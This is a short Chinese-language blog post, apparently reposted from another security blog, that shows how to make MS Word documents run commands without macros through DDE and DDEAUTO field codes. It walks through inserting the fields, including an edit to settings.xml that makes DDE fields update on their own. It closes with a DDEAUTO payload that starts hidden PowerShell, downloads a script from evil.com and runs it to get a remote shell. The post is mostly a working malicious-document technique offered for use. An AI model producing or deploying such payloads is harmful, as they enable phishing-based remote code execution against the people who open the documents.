MS Word Code Execution Without Macro

今天学到了一个新的Word执行代码的方式，也是不需要启用宏的，所以分享给大家一波。操作也挺简单的。

首先新建一个word文档，然后插入域：

图片[1]-MS Word Code Execution Without Macro - DDE & DDEAUTO

选择 = (Formula)

图片[2]-MS Word Code Execution Without Macro - DDE & DDEAUTO

右键，切换域代码

图片[3]-MS Word Code Execution Without Macro - DDE & DDEAUTO

代码处修改为

{DDEAUTO c:\\windows\\system32\\cmd.exe “/k calc.exe” }

图片[4]-MS Word Code Execution Without Macro - DDE & DDEAUTO

之后，右键更新域，再把文档改成docx格式即可。最终效果如下：

比较鸡肋的是点是以后才会执行。

除了使用DDEAUTO，使用DDE也是可以的，具体如下：

{DDE “c:\\windows\\system32\\cmd.exe” “/c notepad” }

需要注意的是，使用DDE不会自动执行，需要对文档进行修改，将文档重命名为rar，打开以后修改 word/settings.xml,添加

<w:updateFields w:val=”true”/>

个人感觉使用DDE效果更好点。

使用DDE效果如下：

如何获取交互式shell ？

[sourcecode language=”plain”]{ DDEAUTO c:\\Windows\\System32\\cmd.exe "/k powershell.exe -NoP -sta -NonI -W Hidden $e=(New-Object System.Net.WebClient).DownloadString(‘http://evil.com/evil.ps1’);powershell -e $e "}[/sourcecode]

文章出处：Evi1cg’s blog

原文链接：https://evi1cg.me/archives/MSWord_Code_Exec_Without_Macro.html

文章版权归作者所有，未经允许请勿转载。

THE END

教学频道
# Office # DDE

MSWord Code Exec Without Macro

请登录后发表评论

分类